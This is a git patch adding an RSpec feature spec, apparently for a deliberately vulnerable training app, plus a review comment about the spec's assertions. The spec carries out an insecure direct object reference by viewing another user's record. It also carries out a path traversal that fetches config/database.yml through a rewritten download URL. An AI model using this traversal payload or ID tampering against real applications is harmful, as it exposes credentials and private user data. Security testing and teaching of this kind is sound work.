From 8e238e1d81224d1bca21899778ac133075e662f1 Mon Sep 17 00:00:00 2001
From: chrismo
Date: Fri, 27 Sep 2013 18:05:45 -0500
Subject: [PATCH] Insecure Direct Object Reference spec added.

This includes two scenarios - the work_info one mentioned in the tutorials, but also one allowing downloading of source code, which may belong somewhere else as I haven't worked through all the tutorials yet.
---
 spec/features/insecure_dor_spec.rb | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 spec/features/insecure_dor_spec.rb

diff --git a/spec/features/insecure_dor_spec.rb b/spec/features/insecure_dor_spec.rb
new file mode 100644
index 0000000..b0ac570
--- /dev/null
+++ b/spec/features/insecure_dor_spec.rb
@@ -0,0 +1,29 @@
+require 'spec_helper'
+
+feature 'insecure direct object reference' do
+ before do
+ UserFixture.reset_all_users
+ @normal_user = UserFixture.normal_user
+ end
+
+ scenario 'download production configuration' do
+ login(@normal_user)
+
+ visit "/users/#{@normal_user.user_id}/benefit_forms"
+ download_url = first('.widget-body a')[:href]
+ visit download_url.sub(/name=(.*?)&/, 'name=../../config/database.yml&')
+
+ page.status_code.should == 200
+ page.response_headers['Content-Disposition'].should include('database.yml')
+ page.response_headers['Content-Length'].should == '576'
+ end
+
+ scenario 'view any user work_info' do
+ login(@normal_user)
+
+ @normal_user.user_id.should_not == 2
+ visit '/users/2/work_info'
+
+ first('td').text.should == 'Jack Mannino'
+ end
+end
\ No newline at end of file
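Review bot: The assertion `page.response_headers['Content-Length'].should == '576'` in the download scenario pins the spec to the current byte size of config/database.yml, so any edit to that file breaks a spec whose point is that the file is served at all; the existing `Content-Disposition` check plus a non-empty body (`page.body.should_not be_empty`) would make the same point without that coupling. The capture group in `/name=(.*?)&/` is never used, so `/name=[^&]*&/` states the intent more plainly. Both scenarios pass only while the weakness is present, which is worth saying in a header comment so the file is not mistaken for a regression test of the fixed behaviour — e.g. `# Documents the insecure direct object reference; these scenarios are expected to fail once the benefit_forms download and the work_info lookup enforce authorization.` The file also lacks a trailing newline, which the diff flags.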